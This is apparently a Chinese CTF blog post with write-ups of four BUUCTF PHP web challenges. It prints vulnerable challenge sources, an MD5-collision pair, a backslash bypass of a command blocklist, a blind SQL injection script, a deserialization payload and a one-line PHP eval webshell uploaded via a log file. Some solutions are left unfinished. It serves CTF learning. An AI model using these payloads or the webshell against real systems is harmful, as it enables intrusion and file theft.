BUU CTF Learn 3

好嘛。上一个文章编码乱了,我也不知道为啥,再开一个吧!

[安洵杯 2019]easy_web

考点:

base64加密

正则绕过

解题:

打开后是一个黑页

在url中发现了类似于base64编码的东西

解码看看:

TXpVek5UTTFNbVUzTURabE5qYz0

MzUzNTM1MmU3MDZlNjc=

3535352e706e67

hex转str:555.png

猜测这里可以文件读取

尝试读取index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
     header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
 
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
     echo '<img src ="./ctf3.jpeg">';
     die("xixi~ no flag");
} else {
     $txt = base64_encode(file_get_contents($file));
     echo "<img src='data:image/gif;base64," . $txt . "'></img>";
     echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
     echo("forbid ~");
     echo "<br>";
} else {
     if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
          echo `$cmd`;
} else {
          echo ("md5 is funny ~");
}
}
?>

源码审计(我吐了

可以发现过滤了一吨函数

但是这里的最下面cmd可以利用来读取文件

MD5生日攻击满足判断

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

可以这里过滤了一吨函数,怎么读flag呢?

本地测试发现ca\t /flag不会被过滤

传入后源代码获得flag!

 

[CISCN2019 总决赛 Day2 Web1]Easyweb

考点:

解题:

打开后是登陆框,尝试各种登录报500后,扫目录得robots.txt

获得image.php.bak

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
include "config.php";
 
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";
 
$id=addslashes($id);
$path=addslashes($path);
 
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
 
$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);
 
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

源码审计(杂又审计

//这题好像有问题跑不出来

 

1
2
3
4
5
6
7
8
9
10
11
12
import  requests
 
url = "http://31cc2ff3-7be1-484e-b9bc-d665bf705ad6.node3.buuoj.cn/image.php?id=\\0&path="
payload = "or id=if(ascii(substr((select username from users),{0},1))>{1},1,0)%23"
result = ""
for i in range(1,100):
    l = 1
    r = 130
    mid = (l + r)>>1
    while(l<r): payloads = payload.format(i,mid) print(url+payloads) html = requests.get(url+payloads) if "JFIF" in html.text: l = mid +1 else: r = mid mid = (l + r)>>1
    result+=chr(mid)
    print(result)

这里表名是猜出来的,登录成功后上传短木马到日志文件,然后蚁剑连接获得flag

文件名:<?=@eval($_POST['a']);?>

然后就有flag

[安洵杯 2019]easy_serialize_php

考点:

反序列化

解题:

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php
 
$function = @$_GET['f'];
 
function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}
 
 
if($_SESSION){
    unset($_SESSION);
}
 
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
 
extract($_POST);
 
if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}
 
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
 
$serialize_info = filter(serialize($_SESSION));
 
if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

打开即源码,源码审计

提示我们phpinfo中可能有东西,我们去看看

发现flag的存放地址是 d0g3_f1ag.php

payload:_SESSION[user]=;s:14:”phpflagphpflag”;s:7:”xxxxxxx”;s:3:”img”;s:20:”L2QwZzNfZmxsbGxsbGFn”;}

这题的反序列化点还没找到、慢慢找一下

 

[SUCTF 2019]EasyWeb

考点

解题

又开门给源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
function get_the_flag(){
    // webadmin will remove your upload file every 20 min!!!! 
    $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
    if(!file_exists($userdir)){
    mkdir($userdir);
    }
    if(!empty($_FILES["file"])){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name,".")+1);
    if(preg_match("/ph/i",$extension)) die("^_^"); 
        if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^"); if(!exif_imagetype($tmp_name)) die("^_^"); $path= $userdir."/".$name; @move_uploaded_file($tmp_name, $path); print_r($path); } } $hhh = @$_GET['_']; if (!$hhh){ highlight_file(__FILE__); } if(strlen($hhh)>18){
    die('One inch long, one inch strong!');
}
 
if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
    die('Try something else!');
 
$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");
 
eval($hhh);

审计吧

不会告辞

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

Protected with IP Blacklist CloudIP Blacklist Cloud